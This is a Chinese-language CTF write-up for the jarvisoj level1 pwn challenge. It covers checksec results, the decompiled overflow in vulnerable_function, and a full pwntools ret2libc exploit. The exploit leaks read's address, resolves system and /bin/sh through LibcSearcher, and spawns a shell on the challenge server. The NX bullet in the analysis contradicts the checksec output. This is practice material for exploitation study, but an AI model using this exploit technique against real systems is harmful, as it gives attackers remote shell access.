jarvisoj level1
# jarvisoj level1
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_level1/level1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
1
2
3
4
5
6
7
2
3
4
5
6
7
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function();
write(1, "Hello, World!\n", 0xEu);
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
vulnerable_function函数如下:
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
printf("What's this:%p?\n", &buf);
return read(0, &buf, 0x100u);
}
1
2
3
4
5
6
7
2
3
4
5
6
7
# 思路分析
目前信息:
vulnerable_function函数存在溢出点- No canary found
- NX enabled
- No PIE
- Has RWX segments
思路:
- 有
RWX权限,栈上buf地址已知,采用ret2shellcode
- 有
问题
- 本地环境与远程环境不同,远程不回显无法得到
buf地址,最终采用ret2libc做法
- 本地环境与远程环境不同,远程不回显无法得到
# exp
from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_level1/level1'
elf = ELF(pwnfile)
io = remote("node4.buuoj.cn", 25274)
# io = process(pwnfile)
padding = 0x88+4
write_plt = elf.plt['write']
read_got = elf.got['read']
main_addr = elf.symbols['main']
payload = flat(['a'*padding, write_plt, main_addr, 1, read_got, 4])
io.send(payload)
leak_read_addr = u32(io.recv(4))
libc = LibcSearcher('read', leak_read_addr)
libc_base = leak_read_addr-libc.dump('read')
system_addr = libc_base+libc.dump('system')
bin_sh = libc_base+libc.dump('str_bin_sh')
payload = flat(['a'*padding, system_addr, 0xdeadbeef, bin_sh])
io.send(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
上次更新: 2022/08/15, 00:29:49